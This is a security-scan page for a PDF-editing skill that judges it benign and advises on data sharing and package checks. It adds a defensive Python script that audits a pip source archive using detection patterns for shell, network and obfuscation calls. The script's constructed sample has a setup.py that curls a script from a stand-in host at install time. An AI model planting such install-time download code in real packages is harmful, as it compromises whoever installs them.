Skill v1.0.1

ClawScan security

nano-banana-pdf-edit · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

Benign · Feb 21, 2026, 10:03 PM
Verdict
Benign
Confidence
high
Model
gpt-5-mini
Summary
The skill's requirements and runtime instructions are consistent with its stated purpose (using the nano-pdf CLI plus a Gemini Image API key to perform visual PDF edits), but it will send images—and optionally PDF text—to an external model (Gemini), so users should be aware of data-sharing and billing implications.
Guidance
This skill appears coherent for visually editing PDFs, but be aware of these practical concerns before installing or using it:
- Data exposure: The tool converts pages to images and sends them (and optionally the PDF text, if you enable --use-context) to Google Gemini. Do not use it with sensitive or confidential PDFs unless you accept that the data will be sent to Google's API and may be billed.
- API key management: Provide a Gemini API key tied to a project with appropriate billing limits. Consider using a restricted or ephemeral key or project to limit blast radius and cost, and revoke it if you suspect misuse.
- Verify packages/sources: The skill instructs you to pip install nano-pdf and references GitHub repos. Inspect the nano-pdf package source (PyPI/GitHub) and confirm the repository owner before installing to avoid installing a malicious package.
- Test safely: Try the workflow on non-sensitive sample PDFs first to confirm results and costs.
- Use options to limit leakage: Use --no-use-context if you do not want the agent to send the full document text as context, and prefer --disable-google-search if you want to avoid additional external lookups.
If you want a stricter assessment, provide the exact nano-pdf package source (PyPI page or the GitHub repo contents) so I can inspect the code that will be installed and called.

Review Dimensions

Purpose & Capability
note: The name, description, and declared requirements (python3 and GEMINI_API_KEY) match the behavior described in SKILL.md: invoking the nano-pdf CLI, which uses Gemini Image to edit rendered PDF page images. Minor inconsistency: registry metadata listed source/homepage as unknown/none while SKILL.md/README reference GitHub repos (ps06756/nano-banana-pdf-skill and gavrielc/Nano-PDF). Verify the repository origin before installing.
Instruction Scope
note: SKILL.md stays within the purpose: it instructs the agent to check dependencies, run nano-pdf edit/add commands, and optionally include document context. Important scope note: the workflow converts PDF pages to images and sends them (and, if enabled, the full PDF text via --use-context) to an external model (Google Gemini). That is necessary for the feature but means document content is transmitted outside the host system.
Install Mechanism
ok: This is an instruction-only skill with no install spec or bundled code. It asks users to install nano-pdf via pip and standard OS packages (poppler, tesseract), which is proportionate and expected. Because installation happens via pip/OS package managers, users should validate the nano-pdf package source (PyPI/GitHub) before installing.
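Both the "Verify packages/sources" guidance above and this Install Mechanism note tell you to inspect the nano-pdf source and confirm its repository before running pip install. The script below is an added example of how to do that mechanically; it is not ClawHub's scanner code and not part of the nano-pdf project. It assumes you first fetched the source distribution without installing it, e.g. `pip download nano-pdf --no-deps --no-binary :all: -d ./audit` (the ./audit directory and the expected repository URL passed in are assumptions), then reads the archive in memory without extracting or executing anything: it checks that the package's own metadata points at the repository the skill documentation names, rates any shell, network, eval or obfuscation calls as high when they sit in setup.py/setup.cfg/pyproject.toml (code that runs at install time) and as informational in package code, and emits a hash-pinned requirement line so a later install cannot silently pick up a different artifact. The built-in sample archive is constructed for the demo and is not the real package.

```python
"""Pre-install audit of a pip source distribution (sdist).

Added example; not ClawHub scanner code and not part of nano-pdf.
Assumes the sdist was fetched with
    pip download nano-pdf --no-deps --no-binary :all: -d ./audit
and audit_sdist() is pointed at the resulting .tar.gz bytes.
"""
import hashlib
import io
import re
import tarfile

# Files that pip/setuptools evaluate or execute while installing an sdist.
INSTALL_TIME_FILES = ("setup.py", "setup.cfg", "pyproject.toml")

# Source patterns worth a human look. Hits in INSTALL_TIME_FILES are "high"
# (that code runs on `pip install`); hits in package code are "info", since a
# Gemini client is expected to use the network.
SUSPICIOUS_PATTERNS = {
    "shell_exec": re.compile(r"\b(os\.system|os\.popen|subprocess\.\w+)\s*\("),
    "network": re.compile(r"\b(urllib|requests|socket|http\.client)\b"),
    "dynamic_exec": re.compile(r"\b(exec|eval)\s*\("),
    "obfuscation": re.compile(r"\b(base64\.b64decode|codecs\.decode|zlib\.decompress)\s*\("),
    "custom_command": re.compile(r"\bcmdclass\b"),
}


def _norm(url):
    return url.strip().lower().rstrip("/").removesuffix(".git")


def metadata_urls(pkg_info):
    """Return Home-page and Project-URL targets from PKG-INFO text."""
    urls = []
    for line in pkg_info.splitlines():
        if line.startswith("Home-page:"):
            urls.append(line.partition(":")[2].strip())
        elif line.startswith("Project-URL:"):
            # Format is "Project-URL: <label>, <url>".
            label, sep, url = line.partition(":")[2].partition(",")
            urls.append((url if sep else label).strip())
    return urls


def _members(tar_bytes):
    """Yield (path, bytes) for every regular file, read in memory only."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tf:
        for member in tf.getmembers():
            fh = tf.extractfile(member) if member.isfile() else None
            if fh is not None:
                yield member.name, fh.read()


def audit_sdist(tar_bytes, expected_repo):
    """Scan an sdist; expected_repo is the repo the skill docs point at."""
    findings, urls = [], []
    for path, data in _members(tar_bytes):
        base = path.rsplit("/", 1)[-1]
        if base == "PKG-INFO":
            urls.extend(metadata_urls(data.decode("utf-8", "replace")))
            continue
        if not (base.endswith(".py") or base in INSTALL_TIME_FILES):
            continue
        severity = "high" if base in INSTALL_TIME_FILES else "info"
        if base == "setup.py":
            findings.append(("info", path, "setup_py_present", 0, "runs on pip install; read it in full"))
        for lineno, line in enumerate(data.decode("utf-8", "replace").splitlines(), 1):
            for rule, pattern in SUSPICIOUS_PATTERNS.items():
                if pattern.search(line):
                    findings.append((severity, path, rule, lineno, line.strip()))
    want = _norm(expected_repo)
    repo_match = any(_norm(u).startswith(want) for u in urls)
    return {
        "sha256": hashlib.sha256(tar_bytes).hexdigest(),
        "metadata_urls": urls,
        "repo_match": repo_match,
        "findings": findings,
        "safe_to_install": repo_match and not any(f[0] == "high" for f in findings),
    }


def pin_line(project, version, digest):
    """Line for `pip install --require-hashes -r requirements.txt`."""
    return f"{project}=={version} --hash=sha256:{digest}"


def build_sample_sdist():
    """Constructed sample (not the real nano-pdf): metadata points at a
    lookalike repo and setup.py runs a shell command at install time."""
    files = {
        "nano-pdf-0.0.0/PKG-INFO": "Metadata-Version: 2.1\nName: nano-pdf\n"
        "Version: 0.0.0\nHome-page: https://github.com/attacker/lookalike\n",
        "nano-pdf-0.0.0/setup.py": "import subprocess\nfrom setuptools import setup\n"
        "subprocess.run(['curl', '-s', 'https://example.invalid/x.sh'])\n"
        "setup(name='nano-pdf', version='0.0.0')\n",
        "nano-pdf-0.0.0/nano_pdf/__init__.py": "import requests\n\ndef edit(pdf):\n    return pdf\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for path, text in files.items():
            info = tarfile.TarInfo(path)
            info.size = len(text.encode())
            tf.addfile(info, io.BytesIO(text.encode()))
    return buf.getvalue()


if __name__ == "__main__":
    # Expected repo taken from the scan's Purpose & Capability note.
    report = audit_sdist(build_sample_sdist(), "https://github.com/gavrielc/Nano-PDF")
    for finding in report["findings"]:
        print(finding)
    print("metadata URLs:", report["metadata_urls"], "repo match:", report["repo_match"])
    print("safe to install:", report["safe_to_install"])
    print(pin_line("nano-pdf", "0.0.0", report["sha256"]))
```

On the constructed sample the audit reports the setup.py shell call as high, the requests import in package code as info, and a metadata URL that does not match the expected repository, so safe_to_install is False. A clean result is a prompt to read the code, not a substitute for it: the pattern list is deliberately small, and install-time code can be hidden in ways no grep catches. For a real download, replace the sample bytes with the file pip wrote, and only install from the hash-pinned line once the archive has passed review.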
Credentials
ok: Only GEMINI_API_KEY is required and declared as primaryEnv, which is appropriate for a skill that calls Google's Gemini API. No unrelated credentials or config paths are requested. Note: the key is described as a paid API key; expect billing for image generation and verify the API key's project and permissions.
Persistence & Privilege
ok: The skill does not request always: true or any elevated persistence. It is user-invocable and uses the platform default for autonomous invocation, which is expected for skills. It does not request to modify other skills or system-wide configs.